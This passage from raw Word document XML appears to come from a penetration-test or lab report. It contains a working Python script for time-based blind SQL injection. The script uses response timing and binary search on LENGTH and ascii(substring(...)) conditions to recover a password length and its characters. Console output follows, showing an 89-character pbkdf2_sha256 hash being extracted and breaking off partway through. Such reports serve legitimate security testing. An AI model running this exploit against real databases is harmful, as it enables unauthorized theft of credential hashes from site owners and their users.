              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00765509">
              <w:t>    start = time.perf_counter()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="499507D7" w14:textId="77777777" w:rsidR="00765509" w:rsidRPr="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00765509">
              <w:t>    requests.get(BASE, params={"q": payload}, cookies=COOKIES, headers=HEADERS)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="755AB285" w14:textId="77777777" w:rsidR="00765509" w:rsidRPr="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00765509">
              <w:t>    elapsed = time.perf_counter() - start</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="337F9C57" w14:textId="77777777" w:rsidR="00765509" w:rsidRPr="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00765509">
              <w:t>    return elapsed &gt; THRESHOLD</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="419D918B" w14:textId="77777777" w:rsidR="00765509" w:rsidRPr="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="54E55677" w14:textId="77777777" w:rsidR="00765509" w:rsidRPr="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00765509">
              <w:t>def get_length(subquery: str) -&gt; int:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7D32EC51" w14:textId="77777777" w:rsidR="00765509" w:rsidRPr="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00765509">
              <w:t>    lo, hi = 0, 200</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25A0DE82" w14:textId="77777777" w:rsidR="00765509" w:rsidRPr="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00765509">
              <w:t>    while lo &lt; hi:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2784D71A" w14:textId="77777777" w:rsidR="00765509" w:rsidRPr="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00765509">
              <w:t>        mid = (lo + hi) // 2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E3CCAED" w14:textId="77777777" w:rsidR="00765509" w:rsidRPr="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00765509">
              <w:t>        if oracle(f"LENGTH(({subquery})) &gt; {mid}"):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D41AEB3" w14:textId="77777777" w:rsidR="00765509" w:rsidRPr="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00765509">
              <w:t>            lo = mid + 1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0BD8099C" w14:textId="77777777" w:rsidR="00765509" w:rsidRPr="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00765509">
              <w:t>        else:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="79F54D75" w14:textId="77777777" w:rsidR="00765509" w:rsidRPr="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00765509">
              <w:t>            hi = mid</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="52A96CA7" w14:textId="77777777" w:rsidR="00765509" w:rsidRPr="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00765509">
              <w:t>    return lo</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48BA12EA" w14:textId="77777777" w:rsidR="00765509" w:rsidRPr="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="25748974" w14:textId="77777777" w:rsidR="00765509" w:rsidRPr="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00765509">
              <w:t>def get_char(subquery: str, pos: int) -&gt; str:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="02C9F6F1" w14:textId="77777777" w:rsidR="00765509" w:rsidRPr="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00765509">
              <w:t xml:space="preserve">    lo, hi = 32, 126 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="19134030" w14:textId="77777777" w:rsidR="00765509" w:rsidRPr="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00765509">
              <w:t>    while lo &lt; hi:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1292339B" w14:textId="77777777" w:rsidR="00765509" w:rsidRPr="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00765509">
              <w:t>        mid = (lo + hi) // 2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0DD27457" w14:textId="77777777" w:rsidR="00765509" w:rsidRPr="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00765509">
              <w:t>        cond = f"ascii(substring(({subquery}) from {pos} for 1)) &gt; {mid}"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5DC5D577" w14:textId="77777777" w:rsidR="00765509" w:rsidRPr="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00765509">
              <w:t>        if oracle(cond):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="099B285A" w14:textId="77777777" w:rsidR="00765509" w:rsidRPr="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00765509">
              <w:t>            lo = mid + 1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2067AA50" w14:textId="77777777" w:rsidR="00765509" w:rsidRPr="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00765509">
              <w:t>        else:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="43FD7995" w14:textId="77777777" w:rsidR="00765509" w:rsidRPr="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00765509">
              <w:t>            hi = mid</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E2E1DA5" w14:textId="77777777" w:rsidR="00765509" w:rsidRPr="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00765509">
              <w:t>    return chr(lo)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A343EF2" w14:textId="77777777" w:rsidR="00765509" w:rsidRPr="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="415FBB6E" w14:textId="77777777" w:rsidR="00765509" w:rsidRPr="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00765509">
              <w:t>def main():</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="10A64BFF" w14:textId="77777777" w:rsidR="00765509" w:rsidRPr="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00765509">
              <w:t>    length = get_length(SUBQUERY)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="56BE31BA" w14:textId="77777777" w:rsidR="00765509" w:rsidRPr="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00765509">
              <w:lastRenderedPageBreak/>
              <w:t>    print(f"[+] Password length: {length}")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5986A055" w14:textId="77777777" w:rsidR="00765509" w:rsidRPr="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00765509">
              <w:t>    result = ""</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1CC1CF12" w14:textId="77777777" w:rsidR="00765509" w:rsidRPr="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00765509">
              <w:t>    for pos in range(1, length + 1):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5231B87C" w14:textId="77777777" w:rsidR="00765509" w:rsidRPr="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00765509">
              <w:t>        c = get_char(SUBQUERY, pos)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="587F49CF" w14:textId="77777777" w:rsidR="00765509" w:rsidRPr="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00765509">
              <w:t>        result += c</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="263F5F18" w14:textId="77777777" w:rsidR="00765509" w:rsidRPr="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00765509">
              <w:t>        print(f"[{pos}/{length}] {result}")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="682FEDD7" w14:textId="77777777" w:rsidR="00765509" w:rsidRPr="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00765509">
              <w:t>    print(f"\n[+] Recovered hash: {result}")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11C42DF2" w14:textId="77777777" w:rsidR="00765509" w:rsidRPr="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2E23526A" w14:textId="77777777" w:rsidR="00765509" w:rsidRPr="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00765509">
              <w:t>if __name__ == "__main__":</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C1D7A83" w14:textId="77777777" w:rsidR="00765509" w:rsidRPr="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00765509">
              <w:t>    main()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05A7D1CF" w14:textId="1BC9ACD6" w:rsidR="00765509" w:rsidRPr="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3BB0CECA" w14:textId="77777777" w:rsidR="00765509" w:rsidRPr="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
      <w:pPr>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r w:rsidRPr="00765509">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Result: </w:t>
      </w:r>
      <w:r w:rsidRPr="00765509">
        <w:t>The script again determined the password length to be 89 characters and recovered each character using only response timing, printing its progress:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10790"/>
      </w:tblGrid>
      <w:tr w:rsidR="00765509" w:rsidRPr="00765509" w14:paraId="6E7DD7DC" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10790" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="009BB9CC" w14:textId="77777777" w:rsidR="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:r>
              <w:t>[+] Password length: 89</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="713372DD" w14:textId="77777777" w:rsidR="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:r>
              <w:t>[1/89] p</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5DCA8B7C" w14:textId="77777777" w:rsidR="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:r>
              <w:t>[2/89] pb</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E55FB86" w14:textId="77777777" w:rsidR="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:r>
              <w:t>[3/89] pbk</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="039F179A" w14:textId="77777777" w:rsidR="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:r>
              <w:t>[4/89] pbkd</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="09593335" w14:textId="77777777" w:rsidR="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:r>
              <w:t>[5/89] pbkdf</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E0E3DF0" w14:textId="77777777" w:rsidR="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:r>
              <w:t>[6/89] pbkdf2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="436AF72E" w14:textId="77777777" w:rsidR="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:r>
              <w:t>[7/89] pbkdf2_</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="79997520" w14:textId="77777777" w:rsidR="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:r>
              <w:t>[8/89] pbkdf2_s</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F2F4F87" w14:textId="77777777" w:rsidR="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:r>
              <w:t>[9/89] pbkdf2_sh</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="250AAE1C" w14:textId="77777777" w:rsidR="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:r>
              <w:t>[10/89] pbkdf2_sha</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25C62743" w14:textId="77777777" w:rsidR="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:r>
              <w:t>[11/89] pbkdf2_sha2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3DDD0CEE" w14:textId="77777777" w:rsidR="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:r>
              <w:t>[12/89] pbkdf2_sha25</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6445ED43" w14:textId="77777777" w:rsidR="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:r>
              <w:t>[13/89] pbkdf2_sha256</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="69AC0545" w14:textId="77777777" w:rsidR="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:r>
              <w:t>[14/89] pbkdf2_sha256$</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0753116B" w14:textId="77777777" w:rsidR="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:r>
              <w:t>[15/89] pbkdf2_sha256$1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="18CFF82F" w14:textId="77777777" w:rsidR="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:r>
              <w:t>[16/89] pbkdf2_sha256$15</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7D70F365" w14:textId="77777777" w:rsidR="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:r>
              <w:t>[17/89] pbkdf2_sha256$150</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="71365F1A" w14:textId="77777777" w:rsidR="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:r>
              <w:t>[18/89] pbkdf2_sha256$1500</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4DEB5A90" w14:textId="77777777" w:rsidR="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:r>
              <w:t>[19/89] pbkdf2_sha256$15000</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="58FE125D" w14:textId="77777777" w:rsidR="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:r>
              <w:t>[20/89] pbkdf2_sha256$150000</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="261361A3" w14:textId="77777777" w:rsidR="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:r>
              <w:t>[21/89] pbkdf2_sha256$1500000</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="50957A9D" w14:textId="77777777" w:rsidR="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:r>
              <w:t>[22/89] pbkdf2_sha256$1500000$</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="118DAF0E" w14:textId="77777777" w:rsidR="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:r>
              <w:t>[23/89] pbkdf2_sha256$1500000$c</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="038173A5" w14:textId="77777777" w:rsidR="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:r>
              <w:t>[24/89] pbkdf2_sha256$1500000$cD</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="183E4654" w14:textId="77777777" w:rsidR="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:r>
              <w:t>[25/89] pbkdf2_sha256$1500000$cDS</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="281CBFA3" w14:textId="77777777" w:rsidR="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:r>
              <w:t>[26/89] pbkdf2_sha256$1500000$cDSe</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="71F08FC0" w14:textId="77777777" w:rsidR="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:r>
              <w:t>[27/89] pbkdf2_sha256$1500000$cDSej</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="34C7BA27" w14:textId="77777777" w:rsidR="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:r>
              <w:t>[28/89] pbkdf2_sha256$1500000$cDSejG</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D3D3851" w14:textId="77777777" w:rsidR="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:r>
              <w:t>[29/89] pbkdf2_sha256$1500000$cDSejGZ</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="60A66692" w14:textId="77777777" w:rsidR="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:r>
              <w:t>[30/89] pbkdf2_sha256$1500000$cDSejGZV</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6AB9E5A6" w14:textId="77777777" w:rsidR="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:r>
              <w:t>[31/89] pbkdf2_sha256$1500000$cDSejGZVw</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="78ABFFBF" w14:textId="77777777" w:rsidR="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:r>
              <w:t>[32/89] pbkdf2_sha256$1500000$cDSejGZVwh</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="797F388C" w14:textId="77777777" w:rsidR="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:r>
              <w:t>[33/89] pbkdf2_sha256$1500000$cDSejGZVwhE</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="20A93DEF" w14:textId="77777777" w:rsidR="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>[34/89] pbkdf2_sha256$1500000$cDSejGZVwhE9</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="17B9C308" w14:textId="77777777" w:rsidR="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:r>
              <w:t>[35/89] pbkdf2_sha256$1500000$cDSejGZVwhE9d</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C7BCF24" w14:textId="77777777" w:rsidR="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:r>
              <w:t>[36/89] pbkdf2_sha256$1500000$cDSejGZVwhE9da</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="44C66BA0" w14:textId="77777777" w:rsidR="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:r>
              <w:t>[37/89] pbkdf2_sha256$1500000$cDSejGZVwhE9dah</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B1BA0E9" w14:textId="77777777" w:rsidR="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:r>
              <w:t>[38/89] pbkdf2_sha256$1500000$cDSejGZVwhE9dahY</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3DF8BE92" w14:textId="77777777" w:rsidR="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:r>
              <w:t>[39/89] pbkdf2_sha256$1500000$cDSejGZVwhE9dahYt</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0AB3BC29" w14:textId="77777777" w:rsidR="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:r>
              <w:t>[40/89] pbkdf2_sha256$1500000$cDSejGZVwhE9dahYt3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C46318F" w14:textId="77777777" w:rsidR="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:r>
              <w:t>[41/89] pbkdf2_sha256$1500000$cDSejGZVwhE9dahYt3q</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1BE80B6D" w14:textId="77777777" w:rsidR="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:r>
              <w:t>[42/89] pbkdf2_sha256$1500000$cDSejGZVwhE9dahYt3qf</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="300B0B39" w14:textId="77777777" w:rsidR="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:r>
              <w:t>[43/89] pbkdf2_sha256$1500000$cDSejGZVwhE9dahYt3qfl</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="32BA4D25" w14:textId="77777777" w:rsidR="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:r>
              <w:t>[44/89] pbkdf2_sha256$1500000$cDSejGZVwhE9dahYt3qflU</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="302E4A33" w14:textId="77777777" w:rsidR="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:r>
              <w:t>[45/89] pbkdf2_sha256$1500000$cDSejGZVwhE9dahYt3qflU$</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7AE1647C" w14:textId="77777777" w:rsidR="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:r>
              <w:t>[46/89] pbkdf2_sha256$1500000$cDSejGZVwhE9dahYt3qflU$2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="33D8E0B5" w14:textId="77777777" w:rsidR="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:r>
              <w:t>[47/89] pbkdf2_sha256$1500000$cDSejGZVwhE9dahYt3qflU$2s</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="22315CBE" w14:textId="77777777" w:rsidR="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:r>
              <w:t>[48/89] pbkdf2_sha256$1500000$cDSejGZVwhE9dahYt3qflU$2sx</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5ABFA875" w14:textId="77777777" w:rsidR="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:r>
              <w:t>[49/89] pbkdf2_sha256$1500000$cDSejGZVwhE9dahYt3qflU$2sx3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05AE7CA1" w14:textId="77777777" w:rsidR="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:r>
              <w:t>[50/89] pbkdf2_sha256$1500000$cDSejGZVwhE9dahYt3qflU$2sx3u</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11EFE417" w14:textId="77777777" w:rsidR="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:r>
              <w:t>[51/89] pbkdf2_sha256$1500000$cDSejGZVwhE9dahYt3qflU$2sx3uo</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B0DF14A" w14:textId="77777777" w:rsidR="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:r>
              <w:t>[52/89] pbkdf2_sha256$1500000$cDSejGZVwhE9dahYt3qflU$2sx3uow</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="20EE80CC" w14:textId="77777777" w:rsidR="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:r>
              <w:t>[53/89] pbkdf2_sha256$1500000$cDSejGZVwhE9dahYt3qflU$2sx3uowr</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="78CFCE93" w14:textId="77777777" w:rsidR="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:r>
              <w:t>[54/89] pbkdf2_sha256$1500000$cDSejGZVwhE9dahYt3qflU$2sx3uowr3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5734CDA5" w14:textId="77777777" w:rsidR="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:r>
              <w:t>[55/89] pbkdf2_sha256$1500000$cDSejGZVwhE9dahYt3qflU$2sx3uowr3n</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1FC210AE" w14:textId="77777777" w:rsidR="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:r>
              <w:t>[56/89] pbkdf2_sha256$1500000$cDSejGZVwhE9dahYt3qflU$2sx3uowr3n5</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="73069F9A" w14:textId="77777777" w:rsidR="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:r>
              <w:t>[57/89] pbkdf2_sha256$1500000$cDSejGZVwhE9dahYt3qflU$2sx3uowr3n5y</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6025C038" w14:textId="77777777" w:rsidR="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:r>
